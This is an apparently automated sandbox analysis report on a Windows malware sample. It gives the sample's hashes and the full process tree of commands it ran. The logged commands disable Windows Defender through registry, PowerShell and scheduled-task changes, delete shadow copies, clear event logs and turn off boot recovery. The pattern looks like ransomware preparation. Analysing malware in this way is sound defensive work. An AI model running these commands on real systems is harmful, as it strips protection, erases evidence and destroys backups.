Analysis

  • max time kernel
    2s
  • max time network
    98s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-12-2023 16:02

General

  • Target

    47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35.exe

  • Size

    3.4MB

  • MD5

    177417be748814f6168171a42545f9dd

  • SHA1

    9c8b988e66e0fe6f9dab69b1055e4ee200531094

  • SHA256

    47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35

  • SHA512

    c90eebbd4663ffe4bec089e21e4f7c1a1441e21a2f78cc190b9ce85fd048bf46901aa74273695df7b6434887284a26d4fdaaf657cb5d9c5469574158adc351c2

  • SSDEEP

    49152:EynbnX4Rsrb/TFvO90dL3BmAFd4A64nsfJUvelzON7j93aqSCD0BUCoQPr8bg11t:EyrAe2lS75Hw+i4JROD5R

Score
9/10

Malware Config

Signatures

Processes

  • C:\Users\Admin\AppData\Local\Temp\47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35.exe
    "C:\Users\Admin\AppData\Local\Temp\47dbb2594cd5eb7015ef08b7fb803cd5adc1a1fbe4849dc847c0940f1ccace35.exe"
    1⤵
      PID:2964
      • C:\Windows\SYSTEM32\net.exe
        net.exe stop "SamSs" /y
        2⤵
          PID:4156
          • C:\Windows\system32\net1.exe
            C:\Windows\system32\net1 stop "SamSs" /y
            3⤵
              PID:3396
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell Set-MpPreference -DisableRealtimeMonitoring $true
                4⤵
                  PID:1112
            • C:\Windows\SYSTEM32\net.exe
              net.exe stop "SstpSvc" /y
              2⤵
                PID:3464
                • C:\Windows\system32\net1.exe
                  C:\Windows\system32\net1 stop "SstpSvc" /y
                  3⤵
                    PID:4448
                • C:\Windows\SYSTEM32\net.exe
                  net.exe stop "UnistoreSvc_24466" /y
                  2⤵
                    PID:3760
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 stop "UnistoreSvc_24466" /y
                      3⤵
                        PID:2032
                    • C:\Windows\SYSTEM32\net.exe
                      net.exe stop "WebClient" /y
                      2⤵
                        PID:3828
                      • C:\Windows\SYSTEM32\net.exe
                        net.exe stop "wbengine" /y
                        2⤵
                          PID:4880
                        • C:\Windows\SYSTEM32\net.exe
                          net.exe stop "VSS" /y
                          2⤵
                            PID:2820
                          • C:\Windows\SYSTEM32\net.exe
                            net.exe stop "vmicvss" /y
                            2⤵
                              PID:3520
                            • C:\Windows\SYSTEM32\net.exe
                              net.exe stop "SDRSVC" /y
                              2⤵
                                PID:5020
                              • C:\Windows\SYSTEM32\sc.exe
                                sc.exe config "SamSs" start= disabled
                                2⤵
                                • Launches sc.exe
                                PID:4164
                              • C:\Windows\SYSTEM32\sc.exe
                                sc.exe config "VSS" start= disabled
                                2⤵
                                • Launches sc.exe
                                PID:2252
                              • C:\Windows\SYSTEM32\sc.exe
                                sc.exe config "UnistoreSvc_24466" start= disabled
                                2⤵
                                • Launches sc.exe
                                PID:2180
                              • C:\Windows\SYSTEM32\sc.exe
                                sc.exe config "WebClient" start= disabled
                                2⤵
                                • Launches sc.exe
                                PID:3592
                              • C:\Windows\SYSTEM32\sc.exe
                                sc.exe config "wbengine" start= disabled
                                2⤵
                                • Launches sc.exe
                                PID:1928
                              • C:\Windows\SYSTEM32\sc.exe
                                sc.exe config "vmicvss" start= disabled
                                2⤵
                                • Launches sc.exe
                                PID:4236
                              • C:\Windows\SYSTEM32\sc.exe
                                sc.exe config "SstpSvc" start= disabled
                                2⤵
                                • Launches sc.exe
                                PID:2020
                              • C:\Windows\SYSTEM32\sc.exe
                                sc.exe config "SDRSVC" start= disabled
                                2⤵
                                • Launches sc.exe
                                PID:3620
                              • C:\Windows\SYSTEM32\reg.exe
                                reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                2⤵
                                  PID:2456
                                • C:\Windows\SYSTEM32\reg.exe
                                  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
                                  2⤵
                                    PID:8
                                  • C:\Windows\SYSTEM32\reg.exe
                                    reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
                                    2⤵
                                      PID:2952
                                    • C:\Windows\SYSTEM32\reg.exe
                                      reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
                                      2⤵
                                        PID:4232
                                      • C:\Windows\SYSTEM32\reg.exe
                                        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
                                        2⤵
                                          PID:2320
                                        • C:\Windows\SYSTEM32\reg.exe
                                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
                                          2⤵
                                            PID:2872
                                          • C:\Windows\SYSTEM32\reg.exe
                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
                                            2⤵
                                              PID:3152
                                            • C:\Windows\SYSTEM32\reg.exe
                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
                                              2⤵
                                                PID:384
                                              • C:\Windows\SYSTEM32\reg.exe
                                                reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
                                                2⤵
                                                  PID:4904
                                                • C:\Windows\SYSTEM32\reg.exe
                                                  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
                                                  2⤵
                                                    PID:3668
                                                  • C:\Windows\SYSTEM32\reg.exe
                                                    reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
                                                    2⤵
                                                      PID:4600
                                                    • C:\Windows\SYSTEM32\reg.exe
                                                      reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
                                                      2⤵
                                                        PID:2528
                                                      • C:\Windows\SYSTEM32\reg.exe
                                                        reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
                                                        2⤵
                                                          PID:4168
                                                        • C:\Windows\SYSTEM32\reg.exe
                                                          reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
                                                          2⤵
                                                            PID:3340
                                                          • C:\Windows\SYSTEM32\reg.exe
                                                            reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
                                                            2⤵
                                                              PID:1228
                                                            • C:\Windows\SYSTEM32\reg.exe
                                                              reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
                                                              2⤵
                                                                PID:4460
                                                              • C:\Windows\SYSTEM32\schtasks.exe
                                                                schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
                                                                2⤵
                                                                  PID:4624
                                                                • C:\Windows\SYSTEM32\reg.exe
                                                                  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
                                                                  2⤵
                                                                    PID:3560
                                                                  • C:\Windows\SYSTEM32\wevtutil.exe
                                                                    wevtutil.exe cl system
                                                                    2⤵
                                                                    • Clears Windows event logs
                                                                    PID:3664
                                                                  • C:\Windows\SYSTEM32\vssadmin.exe
                                                                    vssadmin.exe delete shadows /all /quiet
                                                                    2⤵
                                                                    • Interacts with shadow copies
                                                                    PID:3776
                                                                  • C:\Windows\SYSTEM32\reg.exe
                                                                    reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
                                                                    2⤵
                                                                      PID:4732
                                                                    • C:\Windows\SYSTEM32\reg.exe
                                                                      reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
                                                                      2⤵
                                                                        PID:2400
                                                                      • C:\Windows\SYSTEM32\wevtutil.exe
                                                                        wevtutil.exe cl security
                                                                        2⤵
                                                                        • Clears Windows event logs
                                                                        PID:3896
                                                                      • C:\Windows\SYSTEM32\reg.exe
                                                                        reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
                                                                        2⤵
                                                                          PID:2968
                                                                        • C:\Windows\System32\Wbem\wmic.exe
                                                                          wmic.exe SHADOWCOPY /nointeractive
                                                                          2⤵
                                                                            PID:2248
                                                                          • C:\Windows\System32\Wbem\wmic.exe
                                                                            wmic.exe shadowcopy delete
                                                                            2⤵
                                                                              PID:2608
                                                                            • C:\Windows\SYSTEM32\wevtutil.exe
                                                                              wevtutil.exe cl application
                                                                              2⤵
                                                                              • Clears Windows event logs
                                                                              PID:4568
                                                                            • C:\Windows\SYSTEM32\bcdedit.exe
                                                                              bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
                                                                              2⤵
                                                                              • Modifies boot configuration data using bcdedit
                                                                              PID:3204
                                                                            • C:\Windows\SYSTEM32\cmd.exe
                                                                              cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
                                                                              2⤵
                                                                                PID:3176
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell Set-MpPreference -DisableIOAVProtection $true
                                                                                  3⤵
                                                                                    PID:2340
                                                                                • C:\Windows\SYSTEM32\cmd.exe
                                                                                  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                  2⤵
                                                                                    PID:4448
                                                                                  • C:\Windows\SYSTEM32\cmd.exe
                                                                                    cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
                                                                                    2⤵
                                                                                      PID:3396
                                                                                    • C:\Windows\SYSTEM32\bcdedit.exe
                                                                                      bcdedit.exe /set {default} recoveryenabled no
                                                                                      2⤵
                                                                                      • Modifies boot configuration data using bcdedit
                                                                                      PID:3160
                                                                                    • C:\Windows\SYSTEM32\reg.exe
                                                                                      reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
                                                                                      2⤵
                                                                                        PID:1724
                                                                                      • C:\Windows\SYSTEM32\reg.exe
                                                                                        reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
                                                                                        2⤵
                                                                                          PID:4848
                                                                                        • C:\Windows\SYSTEM32\reg.exe
                                                                                          reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
                                                                                          2⤵
                                                                                            PID:2364
                                                                                          • C:\Windows\SYSTEM32\reg.exe
                                                                                            reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
                                                                                            2⤵
                                                                                              PID:3612
                                                                                            • C:\Windows\SYSTEM32\reg.exe
                                                                                              reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
                                                                                              2⤵
                                                                                                PID:2292
                                                                                              • C:\Windows\SYSTEM32\reg.exe
                                                                                                reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
                                                                                                2⤵
                                                                                                  PID:3356
                                                                                                • C:\Windows\SYSTEM32\reg.exe
                                                                                                  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
                                                                                                  2⤵
                                                                                                    PID:2740
                                                                                                  • C:\Windows\SYSTEM32\reg.exe
                                                                                                    reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
                                                                                                    2⤵
                                                                                                      PID:2436
                                                                                                    • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                      schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
                                                                                                      2⤵
                                                                                                        PID:1300
                                                                                                      • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                        schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
                                                                                                        2⤵
                                                                                                          PID:396
                                                                                                        • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                          schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
                                                                                                          2⤵
                                                                                                            PID:3220
                                                                                                          • C:\Windows\SYSTEM32\schtasks.exe
                                                                                                            schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
                                                                                                            2⤵
                                                                                                              PID:784
                                                                                                          • C:\Windows\system32\net1.exe
                                                                                                            C:\Windows\system32\net1 stop "vmicvss" /y
                                                                                                            1⤵
                                                                                                              PID:4964
                                                                                                            • C:\Windows\system32\net1.exe
                                                                                                              C:\Windows\system32\net1 stop "WebClient" /y
                                                                                                              1⤵
                                                                                                                PID:4752
                                                                                                              • C:\Windows\system32\net1.exe
                                                                                                                C:\Windows\system32\net1 stop "wbengine" /y
                                                                                                                1⤵
                                                                                                                  PID:4904
                                                                                                                • C:\Windows\system32\net1.exe
                                                                                                                  C:\Windows\system32\net1 stop "VSS" /y
                                                                                                                  1⤵
                                                                                                                    PID:4028
                                                                                                                  • C:\Windows\system32\net1.exe
                                                                                                                    C:\Windows\system32\net1 stop "SDRSVC" /y
                                                                                                                    1⤵
                                                                                                                      PID:3340

                                                                                                                    Network

                                                                                                                    MITRE ATT&CK Enterprise v15

                                                                                                                    Replay Monitor

                                                                                                                    Loading Replay Monitor...

                                                                                                                    Downloads

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                                                                                      Filesize

                                                                                                                      1KB

                                                                                                                      MD5

                                                                                                                      adcf7694324db40696dec9e7145c7d9a

                                                                                                                      SHA1

                                                                                                                      6a5a093f6fec740444de5c219fd6af57f087d436

                                                                                                                      SHA256

                                                                                                                      b7678468701b0c13267926de54a86f833541a6d0420e466d62d1fa948bbfe054

                                                                                                                      SHA512

                                                                                                                      b5ad97789767fe51c37b603b3ec7015008a69699115330404193ceebb3158d5ae674062699b9cb62fa5635a7e78330d952e4438176bd9612d50c424845fb6896

                                                                                                                    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                      Filesize

                                                                                                                      944B

                                                                                                                      MD5

                                                                                                                      6d42b6da621e8df5674e26b799c8e2aa

                                                                                                                      SHA1

                                                                                                                      ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

                                                                                                                      SHA256

                                                                                                                      5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

                                                                                                                      SHA512

                                                                                                                      53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_1fcign3z.up3.ps1

                                                                                                                      Filesize

                                                                                                                      60B

                                                                                                                      MD5

                                                                                                                      d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                      SHA1

                                                                                                                      6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                      SHA256

                                                                                                                      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                      SHA512

                                                                                                                      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                    • memory/1112-33-0x0000014729360000-0x0000014729370000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/1112-36-0x00007FFF31020000-0x00007FFF31AE1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/1112-31-0x0000014729360000-0x0000014729370000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/1112-34-0x0000014729360000-0x0000014729370000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/1112-32-0x0000014729360000-0x0000014729370000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/1112-30-0x00007FFF31020000-0x00007FFF31AE1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/2340-14-0x000002252D900000-0x000002252D910000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/2340-18-0x00007FFF31020000-0x00007FFF31AE1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/2340-12-0x00007FFF31020000-0x00007FFF31AE1000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      10.8MB

                                                                                                                    • memory/2340-13-0x000002252D900000-0x000002252D910000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB

                                                                                                                    • memory/2340-2-0x000002252DB00000-0x000002252DB22000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      136KB

                                                                                                                    • memory/2340-15-0x000002252D900000-0x000002252D910000-memory.dmp

                                                                                                                      Filesize

                                                                                                                      64KB